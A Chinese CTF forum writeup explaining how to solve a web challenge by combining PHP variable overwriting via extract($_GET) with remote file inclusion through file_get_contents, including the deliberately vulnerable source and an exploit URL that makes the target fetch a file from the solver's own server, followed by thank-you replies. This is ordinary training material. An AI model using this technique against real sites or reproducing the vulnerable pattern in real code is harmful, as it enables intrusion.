设为首页
收藏本站
开启辅助访问
切换到窄版
登录
立即注册
只需一步,快速开始
论坛
BBS
Tools
CTF在线工具箱,CTF工具下载
CTF平台1
BugkuCTF - CTF爱好者的练习平台
CTF平台2
搜索
搜索
每日签到
本版
帖子
战队
用户
CTF论坛
»
论坛
›
技术交流
›
CTF/安全技术交流
›
web1利用RFI解题
返回列表
发新帖
[Writeup]
web1利用RFI解题
[复制链接]
7700
|
5
|
2019-4-10 08:55:55
|
显示全部楼层
|
阅读模式
题目:
看题型主要出题思路是变量覆盖+RFI(远程文件包含)
知识点链接:
变量覆盖:
https://www.cnblogs.com/xiaozi/p/7768580.html
远程文件包含:
https://blog.csdn.net/sx234com/article/details/88994605
解题过程代码分析;自己按照上面的代码写出来验证一下是最好的解题思路。
<?php
header("Content-type:text/html;charset=utf-8");
include 'flag.php';
//echo var_dump($_GET);
$b='ssAEDsssss';
extract($_GET); //见到extract函数 考虑变量覆盖
if(isset($a)){
$c=trim(file_get_contents($b));
//A 此处 读取$b的值 因为使用了file_get_contents函数则有可能出现RFI远程文件包含漏洞
//B 构造一个远程文件info.txt 放置在我自己的服务器上面 info.txt中内容为 1 远程访问链接为http://自己的域名/info.txt
//C 而$b变量上面已经赋值 见到extract函数 考虑变量覆盖
//D 故 url在构造的时候就可以进行赋值覆盖上面$b='ssAEDsssss'; 的值 利用上面B得到的url 让file_get_contents读取远程info.txt内容1 覆盖变量$b 则$b的值为1
//E 构造URL 如下:
http://123.206.31.85:10001/?a=1&b=http://
你的域名/readme.txt&c=1 使传入值全部为1 触发成功
echo 'b='.$b.'<br/>';
echo 'a='.$a.'<br/>';
echo 'c='.$c.'<br/>';
if($a==$c){
echo "ok flag is xxx";
}else{
echo '不行没得到!';
}
}
得到的运行结果如下:
评分
参与人数
1
银两
+3
收起
理由
Harry
+ 3
查看全部评分
回复
使用道具
举报
变色卡
照妖镜
王叹之
|
2019-4-13 09:38:44
|
显示全部楼层
666学到了
回复
使用道具
举报
照妖镜
Never
|
2019-4-17 21:54:15
|
显示全部楼层
谢谢,学到了
回复
使用道具
举报
照妖镜
Beibee
|
2019-5-5 17:12:16
|
显示全部楼层
原来还可以利用远程文件包含,感谢分享
回复
使用道具
举报
照妖镜
见习飞行员
|
2019-5-8 22:10:38
|
显示全部楼层
学到了学到了
回复
使用道具
举报
照妖镜
zhan
|
2019-5-13 21:58:50
|
显示全部楼层
学到了。。。。。。。
回复
使用道具
举报
照妖镜
返回列表
发新帖
高级模式
B
Color
Image
Link
Quote
Code
Smilies
您需要登录后才可以回帖
登录
|
立即注册
本版积分规则
发表回复
回帖后跳转到最后一页
sx234com
2
主题
6
帖子
119
积分
小有名气
小有名气, 积分 119, 距离下一级还需 81 积分
小有名气, 积分 119, 距离下一级还需 81 积分
积分
119
发消息
回复楼主
返回列表
新手入门/靶场实验
CTF/安全技术交流
CTF题库/赛事预告